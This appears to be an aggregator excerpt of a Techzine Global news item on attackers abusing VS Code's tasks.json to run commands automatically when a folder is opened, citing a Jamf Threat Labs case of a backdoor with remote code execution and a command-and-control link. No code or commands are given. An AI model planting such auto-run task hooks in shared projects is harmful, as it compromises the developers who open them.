"This is not a vulnerability in Visual Studio Code itself, but rather functionality that works as intended. The tasks.json file is designed to launch command line tools from within the editor and can automatically execute tasks as soon as a folder is opened. These configurations are usually located in the hidden .vscode folder and are easily shared when code is shared via platforms such as GitHub."
"Microsoft has built in several protective measures. Folders are marked as untrusted by default, and tasks are only executed after a user explicitly grants trust. A warning also appears when code is started automatically. In practice, however, this protection appears to be of limited effectiveness. The dialog box visually emphasizes continuing after granting trust, while the warning text points out the risks. In addition, previously set trust rules can cause new subfolders to be automatically accepted."
"The findings of Jamf Threat Labs illustrate how far this abuse can go. In the case investigated, a backdoor was installed via tasks.json that enabled remote code execution, mapped systems, and maintained a persistent connection to a command and control server. The tasks contained commands for macOS, Windows, and Linux and retrieved external JavaScript via curl. Because the payload was hosted exte"
Security researchers identify Visual Studio Code being used in supply chain attacks that exploit tasks.json to automatically run commands when a project folder is opened. The tasks.json mechanism launches command-line tools from inside the editor and resides in the hidden .vscode folder, making malicious configurations easy to share via platforms like GitHub. Microsoft implemented trust controls and warnings, but the UI and inherited trust rules frequently lead users to grant or inherit trust. Jamf Threat Labs documented a case where tasks.json installed a backdoor enabling remote code execution, system mapping, persistence, C2 connectivity, and multi-OS commands.
Read at Techzine Global
Unable to calculate read time
Collection
[
|
...
]